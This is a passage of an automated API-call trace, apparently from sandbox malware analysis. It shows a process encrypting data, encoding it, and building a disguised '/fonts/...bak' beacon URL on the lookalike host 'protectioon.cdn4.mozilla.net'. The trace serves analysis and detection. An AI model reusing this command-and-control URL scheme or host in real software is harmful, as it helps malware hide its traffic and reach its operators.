pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59ce8, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59ce8) returned 0x2c59ce8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59cf8, _Src=0x2c59c18, _Size=0x10 | out: _Dst=0x2c59cf8) returned 0x2c59cf8 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59d08, _Src=0x2c59c28, _Size=0x10 | out: _Dst=0x2c59d08) returned 0x2c59d08 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] memcpy (in: _Dst=0x2c59d18, _Src=0x2c59c38, _Size=0x4 | out: _Dst=0x2c59d18) returned 0x2c59d18 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d18*, pdwDataLen=0x11ff074*=0x4, dwBufLen=0x20 | out: pbData=0x2c59d18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0261.781] CryptDestroyKey (hKey=0x77d0f8) returned 1 [0261.782] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0261.782] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0261.782] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa38 [0261.782] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c48 | out: hHeap=0x2860000) returned 1 [0261.783] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b68 | out: hHeap=0x2860000) returned 1 [0261.783] StrTrimA (psz="5IPJZCWvu/SlFe3sg0SfpJ/w87KnDk4pxI6uM9uh5TWjfwKZS3I2AnPIUlGG0VzmwR3UdRJOGZv9Ly1Hfz2FVzcMR5IZ9YZ8lm5yDeYsJyHPQbpkr0NZArwt5L1W6KytuQF+IW3kgkTdAW/XjB4p/o2dJztfXkxAoQZksexuXKFeRIunski2g76t2wuMhAnuCTOppQTZW6fSMQGINNGgL3gPJ1GlAg9A5FuahoOgIOZAIEBF/VS8Vb0nC36/r/8HbGQ/pwvePkBZQNRS92Zc5auHhOwt07hfydG/e1VCXj5=", pszTrimChars="\r\n=") [0261.783] StrTrimA (in: psz="5IPJZCWvu/SlFe3sg0SfpJ/w87KnDk4pxI6uM9uh5TWjfwKZS3I2AnPIUlGG0VzmwR3UdRJOGZv9Ly1Hfz2FVzcMR5IZ9YZ8lm5yDeYsJyHPQbpkr0NZArwt5L1W6KytuQF+IW3kgkTdAW/XjB4p/o2dJztfXkxAoQZksexuXKFeRIunski2g76t2wuMhAnuCTOppQTZW6fSMQGINNGgL3gPJ1GlAg9A5FuahoOgIOZAIEBF/VS8Vb0nC36/r/8HbGQ/pwvePkBZQNRS92Zc5auHhOwt07hfydG/e1VCXj5=", pszTrimChars="\r\n=" | out: psz="5IPJZCWvu/SlFe3sg0SfpJ/w87KnDk4pxI6uM9uh5TWjfwKZS3I2AnPIUlGG0VzmwR3UdRJOGZv9Ly1Hfz2FVzcMR5IZ9YZ8lm5yDeYsJyHPQbpkr0NZArwt5L1W6KytuQF+IW3kgkTdAW/XjB4p/o2dJztfXkxAoQZksexuXKFeRIunski2g76t2wuMhAnuCTOppQTZW6fSMQGINNGgL3gPJ1GlAg9A5FuahoOgIOZAIEBF/VS8Vb0nC36/r/8HbGQ/pwvePkBZQNRS92Zc5auHhOwt07hfydG/e1VCXj5") returned 1 [0261.783] lstrlenA (lpString="5IPJZCWvu/SlFe3sg0SfpJ/w87KnDk4pxI6uM9uh5TWjfwKZS3I2AnPIUlGG0VzmwR3UdRJOGZv9Ly1Hfz2FVzcMR5IZ9YZ8lm5yDeYsJyHPQbpkr0NZArwt5L1W6KytuQF+IW3kgkTdAW/XjB4p/o2dJztfXkxAoQZksexuXKFeRIunski2g76t2wuMhAnuCTOppQTZW6fSMQGINNGgL3gPJ1GlAg9A5FuahoOgIOZAIEBF/VS8Vb0nC36/r/8HbGQ/pwvePkBZQNRS92Zc5auHhOwt07hfydG/e1VCXj5") returned 299 [0261.783] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc00 [0261.783] _snprintf (_Dest=0x2c5fc09, _Count=0x4, _Format="%c%02X") [0261.783] _snprintf (in: _Dest=0x2c5fc09, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fc18, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fc87, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fc94, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fc9c, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fcfa, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fd07, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.783] _snprintf (in: _Dest=0x2c5fd0b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.784] _snprintf (in: _Dest=0x2c5fd13, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.784] _snprintf (in: _Dest=0x2c5fd35, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0261.784] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0261.784] lstrlenA (lpString="5IPJZCWvu_2FSlFe3sg0SfpJ_2Fw87KnDk4pxI6uM9uh5TWjfwKZS3I2AnPIUlGG0VzmwR3UdRJOGZv9Ly1Hfz2FVzcMR5IZ9YZ8lm5yDeYsJyHPQbpkr0NZArwt5L1W6KytuQF_2BIW3kgkTdAW_2FXjB4p_2Fo2dJztfXkxAoQZksexuXKFeRIunski2g76t2wuMhAnuCTOppQTZW6fSMQGINNGgL3gPJ1GlAg9A5FuahoOgIOZAIEBF_2FVS8Vb0nC36_2Fr_2F8HbGQ_2FpwvePkBZQNRS92Zc5auHhOwt07hfydG_2Fe1VCXj5") returned 319 [0261.784] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x167) returned 0x2c5fa38 [0261.784] memcpy (in: _Dst=0x2c5fa38, _Src=0x2c5fc00, _Size=0x14 | out: _Dst=0x2c5fa38) returned 0x2c5fa38 [0261.784] memcpy (in: _Dst=0x2c5fa4d, _Src=0x2c5fc14, _Size=0x13 | out: _Dst=0x2c5fa4d) returned 0x2c5fa4d [0261.784] memcpy (in: _Dst=0x2c5fa61, _Src=0x2c5fc27, _Size=0x16 | out: _Dst=0x2c5fa61) returned 0x2c5fa61 [0261.784] memcpy (in: _Dst=0x2c5fa78, _Src=0x2c5fc3d, _Size=0xd | out: _Dst=0x2c5fa78) returned 0x2c5fa78 [0261.784] memcpy (in: _Dst=0x2c5fa86, _Src=0x2c5fc4a, _Size=0x8 | out: _Dst=0x2c5fa86) returned 0x2c5fa86 [0261.784] memcpy (in: _Dst=0x2c5fa8f, _Src=0x2c5fc52, _Size=0x17 | out: _Dst=0x2c5fa8f) returned 0x2c5fa8f [0261.784] memcpy (in: _Dst=0x2c5faa7, _Src=0x2c5fc69, _Size=0xa | out: _Dst=0x2c5faa7) returned 0x2c5faa7 [0261.784] memcpy (in: _Dst=0x2c5fab2, _Src=0x2c5fc73, _Size=0x11 | out: _Dst=0x2c5fab2) returned 0x2c5fab2 [0261.785] memcpy (in: _Dst=0x2c5fac4, _Src=0x2c5fc84, _Size=0xc | out: _Dst=0x2c5fac4) returned 0x2c5fac4 [0261.785] memcpy (in: _Dst=0x2c5fad1, _Src=0x2c5fc90, _Size=0xb | out: _Dst=0x2c5fad1) returned 0x2c5fad1 [0261.785] memcpy (in: _Dst=0x2c5fadd, _Src=0x2c5fc9b, _Size=0xe | out: _Dst=0x2c5fadd) returned 0x2c5fadd [0261.785] memcpy (in: _Dst=0x2c5faec, _Src=0x2c5fca9, _Size=0x15 | out: _Dst=0x2c5faec) returned 0x2c5faec [0261.785] memcpy (in: _Dst=0x2c5fb02, _Src=0x2c5fcbe, _Size=0x10 | out: _Dst=0x2c5fb02) returned 0x2c5fb02 [0261.785] memcpy (in: _Dst=0x2c5fb13, _Src=0x2c5fcce, _Size=0xf | out: _Dst=0x2c5fb13) returned 0x2c5fb13 [0261.785] memcpy (in: _Dst=0x2c5fb23, _Src=0x2c5fcdd, _Size=0x12 | out: _Dst=0x2c5fb23) returned 0x2c5fb23 [0261.785] memcpy (in: _Dst=0x2c5fb36, _Src=0x2c5fcef, _Size=0x9 | out: _Dst=0x2c5fb36) returned 0x2c5fb36 [0261.785] memcpy (in: _Dst=0x2c5fb40, _Src=0x2c5fcf8, _Size=0x14 | out: _Dst=0x2c5fb40) returned 0x2c5fb40 [0261.785] memcpy (in: _Dst=0x2c5fb55, _Src=0x2c5fd0c, _Size=0x13 | out: _Dst=0x2c5fb55) returned 0x2c5fb55 [0261.785] memcpy (in: _Dst=0x2c5fb69, _Src=0x2c5fd1f, _Size=0x16 | out: _Dst=0x2c5fb69) returned 0x2c5fb69 [0261.785] memcpy (in: _Dst=0x2c5fb80, _Src=0x2c5fd35, _Size=0x9 | out: _Dst=0x2c5fb80) returned 0x2c5fb80 [0261.785] memcpy (in: _Dst=0x2c5fb8a, _Src=0x2c5fd3e, _Size=0x2 | out: _Dst=0x2c5fb8a) returned 0x2c5fb8a [0261.785] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc00 | out: hHeap=0x2860000) returned 1 [0261.785] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b48 | out: hHeap=0x2860000) returned 1 [0261.785] StrTrimA (in: psz="5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5", pszTrimChars="\r\n" | out: psz="5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5") returned 0 [0261.785] lstrlenA (lpString="/fonts/") returned 7 [0261.785] lstrlenA (lpString="5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5") returned 339 [0261.785] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15b) returned 0x2c59b28 [0261.785] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0261.786] lstrcatA (in: lpString1="/fonts/", lpString2="5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5" | out: lpString1="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5") returned="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5" [0261.786] lstrcpyA (in: lpString1=0x2c5fa38, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0261.786] lstrcpyA (in: lpString1=0x2be00d8, lpString2="protectioon.cdn4.mozilla.net" | out: lpString1="protectioon.cdn4.mozilla.net") returned="protectioon.cdn4.mozilla.net" [0261.786] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net", lpString2="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5") returned="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5" [0261.786] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5", lpString2=".bak" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak") returned="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak" [0261.786] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0261.786] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8 [0261.786] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x38c [0261.786] lstrlenA (lpString="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak") returned 378 [0261.786] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x17b) returned 0x2c5fba8 [0261.786] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x17b) returned 0x2c5fd30 [0261.786] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", wMatch=0x2f) returned="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak" [0261.786] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak", wMatch=0x3f) returned 0x0 [0261.786] memcpy (in: _Dst=0x2c5fba8, _Src=0x2be00d8, _Size=0x1c | out: _Dst=0x2c5fba8) returned 0x2c5fba8 [0261.786] lstrcpyA (in: lpString1=0x2c5fd30, lpString2="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak" | out: lpString1="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak") returned="/fonts/5IPJZCWvu_2FSlFe3sg0/SfpJ_2Fw87KnDk4pxI6/uM9uh5TWjfwKZS3I2AnPIU/lGG0VzmwR3UdR/JOGZv9Ly/1Hfz2FVzcMR5IZ9YZ8lm5yD/eYsJyHPQbp/kr0NZArwt5L1W6Kyt/uQF_2BIW3kgk/TdAW_2FXjB4/p_2Fo2dJztfXkx/AoQZksexuXKFeRIunski2/g76t2wuMhAnuCTOp/pQTZW6fSMQGINNG/gL3gPJ1GlAg9A5Fuah/oOgIOZAIE/BF_2FVS8Vb0nC36_2Fr_/2F8HbGQ_2FpwvePkBZQ/NRS92Zc5auHhOwt07hfydG/_2Fe1VCXj/5.bak" [0261.786] lstrlenA 